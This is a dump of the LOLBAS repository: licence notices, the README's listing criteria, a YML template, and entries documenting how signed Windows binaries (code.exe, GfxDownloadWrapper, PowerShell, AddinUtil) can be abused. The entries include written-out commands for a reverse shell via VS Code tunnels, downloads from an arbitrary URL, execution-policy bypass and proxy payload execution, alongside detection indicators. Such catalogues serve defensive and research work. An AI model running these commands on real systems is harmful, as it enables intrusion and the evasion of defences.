(MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK® for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. "© 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation." DISCLAIMERS MITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK. ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. ## Other Notices * Microsoft(R) Windows(R) is a registered trademark of the Microsoft Corporation ================================================ FILE: README.md ================================================

# Living Off The Land Binaries and Scripts (and now also Libraries) All the different files can be found behind a fancy frontend here: https://lolbas-project.github.io (thanks @ConsciousHacker for this bit of eyecandy and the team over at https://gtfobins.github.io/). This repo serves as a place where we maintain the YML files that are used by the fancy frontend. ## Goal The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. ## Criteria A LOLBin/Lib/Script must: * Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. * Have extra "unexpected" functionality. It is not interesting to document intended use cases. * Exceptions are application whitelisting bypasses * Have functionality that would be useful to an APT or red team Interesting functionality can include: * Executing code * Arbitrary code execution * Pass-through execution of other programs (unsigned) or scripts (via a LOLBin) * Compiling code * File operations * Downloading * Upload * Copy * Persistence * Pass-through persistence utilizing existing LOLBin * Persistence (e.g. hide data in ADS, execute at logon) * UAC bypass * Credential theft * Dumping process memory * Surveillance (e.g. keylogger, network trace) * Log evasion/modification * DLL side-loading/hijacking without being relocated elsewhere in the filesystem. We do not approve binaries that allows for netntlm coercing, since most Windows binaries allows for that. Only exception is binaries that allows that on other than default ports (such as rpcping) or can allow direct credential theft. ## Contributing If you have found a new LOLBin or LOLScript that you would like to contribute, please review the contributing guidelines located here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/CONTRIBUTING.md A template for the required format has been provided here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml ## The History of the LOLBin The phrase "Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation) at [DerbyCon 3](https://www.youtube.com/watch?v=j-r6UonEkUw). The term LOLBins came from a Twitter discussion on what to call binaries that can be used by an attacker to perform actions beyond their original purpose. Philip Goh (@MathCasualty) [proposed LOLBins](https://twitter.com/MathCasualty/status/969174982579273728). A highly scientific internet poll ensued, and after a general consensus (69%) was reached, the name was [made official](https://twitter.com/Oddvarmoe/status/985432848961343488). Jimmy (@bohops) [followed up with LOLScripts](https://twitter.com/bohops/status/984828803120881665). No poll was taken. Common hashtags for these files are: * #LOLBin * #LOLBins * #LOLScript * #LOLScripts * #LOLLib * #LOLLibs Our primary maintainer (@oddvarmoe) of this project did a talk at DerbyCon 2018 called: #Lolbins Nothing to LOL about! - https://www.youtube.com/watch?v=NiYTdmZ8GR4 This talk goes over the history of this project. ## Maintainers The following folks help maintain the LOLBAS Project on their personal time: * Oddvar Moe ([@oddvarmoe](https://twitter.com/Oddvarmoe)) * Jimmy Bayne ([@bohops](https://twitter.com/bohops)) * Conor Richard ([@xenosCR](https://twitter.com/xenosCR)) * Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker)) * Liam ([@liamsomerville](https://twitter.com/liamsomerville)) * Wietze ([@Wietze](https://twitter.com/@Wietze)) * Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps)) ## Thanks As with many open-source projects, this one is the product of a community and we would like to thank ours: * The domain http://lolbins.com has been registered by an unknown individual and redirected it to the old version of this project. * The domain http://lolbas-project.com has been registered by Jimmy (@bohops). * The logos for the project were created by Adam Nadrowski (@_sup_mane). We #@&!!@#! love them. ## Notice * Please refer to NOTICE.md for license information ================================================ FILE: YML-Template.yml ================================================ --- Name: Binary.exe Description: Something general about the binary Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality, - Alias: Binary64.exe # but for example, is built for different architecture. Author: The name of the person that created this file Created: 1970-01-01 # YYYY-MM-DD (date the person created this file) Commands: - Command: The command Description: Description of the command Usecase: A description of the usecase Category: Execute Privileges: Required privs MitreID: T1055 OperatingSystem: Windows 10 1803, Windows 10 1703 Tags: - Key1: Value1 # Optional field for one or more tags - Command: The second command Description: Description of the second command Usecase: A description of the usecase Category: AWL Bypass Privileges: Required privs MitreID: T1033 OperatingSystem: Windows 10 All Full_Path: - Path: c:\windows\system32\bin.exe - Path: c:\windows\syswow64\bin.exe Code_Sample: - Code: http://example.com/git.txt Detection: - IOC: Event ID 10 - IOC: binary.exe spawned - Analysis: https://example.com/to/blog/gist/writeup/if/applicable - Sigma: https://example.com/to/sigma/rule/if/applicable - Elastic: https://example.com/to/elastic/rule/if/applicable - Splunk: https://example.com/to/splunk/rule/if/applicable - BlockRule: https://example.com/to/microsoft/block/rules/if/applicable Resources: - Link: http://blogpost.com - Link: http://twitter.com/something - Link: http://example.com/Threatintelreport Acknowledgement: - Person: John Doe Handle: '@johndoe' - Person: Ola Norman Handle: '@olaNor' ================================================ FILE: yml/HonorableMentions/Code.yml ================================================ --- Name: code.exe Description: VSCode binary, also portable (CLI) version Author: PfiatDe Created: 2023-02-01 Commands: - Command: code.exe tunnel --accept-server-license-terms --name "tunnel-name" Description: Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command Usecase: Reverse PowerShell session over MS provided infrastructure. Category: Execute Privileges: User MitreID: T1219.001 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: 'C:\Users\\AppData\Local\Programs\Microsoft VS Code\Code.exe' - Path: C:\Program Files\Microsoft VS Code\Code.exe - Path: C:\Program Files (x86)\Microsoft VS Code\Code.exe Detection: - IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com - IOC: 'Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe' - IOC: 'File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%\.vscode-cli\code_tunnel.json' Resources: - Link: https://badoption.eu/blog/2023/01/31/code_c2.html - Link: https://code.visualstudio.com/docs/remote/tunnels - Link: https://code.visualstudio.com/blogs/2022/12/07/remote-even-better ================================================ FILE: yml/HonorableMentions/GfxDownloadWrapper.yml ================================================ --- Name: GfxDownloadWrapper.exe Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Author: Jesus Galvez Created: 2019-12-27 Commands: - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". Usecase: Download file from internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\GfxDownloadWrapper.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. Resources: - Link: https://www.sothis.tech/author/jgalvez/ Acknowledgement: - Person: Jesus Galvez Handle: ================================================ FILE: yml/HonorableMentions/PowerShell.yml ================================================ --- Name: Powershell.exe Description: Powershell.exe is a a task-based command-line shell built on .NET. Author: 'Everyone' Created: 2024-04-03 Commands: - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1 Description: Set the execution policy to bypass and execute a PowerShell script without warning Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires Category: Execute Privileges: User MitreID: T1059.001 OperatingSystem: Windows 7 and up - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..." Description: Set the execution policy to bypass and execute a PowerShell command Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires Category: Execute Privileges: User MitreID: T1059.001 OperatingSystem: Windows 7 and up - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA== Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires Category: Execute Privileges: User MitreID: T1059.001 OperatingSystem: Windows 7 and up Full_Path: - Path: 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe' - Path: 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' Detection: - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell Resources: - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1 - Link: https://attack.mitre.org/techniques/T1059/001/ Acknowledgement: - Person: Everyone Handle: '@alltheoffensivecyberers' ================================================ FILE: yml/OSBinaries/Addinutil.yml ================================================ --- Name: AddinUtil.exe Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins. Author: 'Michael McKinley @MckinleyMike' Created: 2023-10-05 Commands: - Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:. Description: AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload. Usecase: Proxy execution of malicious serialized payload Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\AddInUtil.exe Code_Sample: - Code: https://gist.github.com/SILJAEUROPA/a850d476179d73df230a876944e9f3b1#file-addins-store Detection: - Sigma: 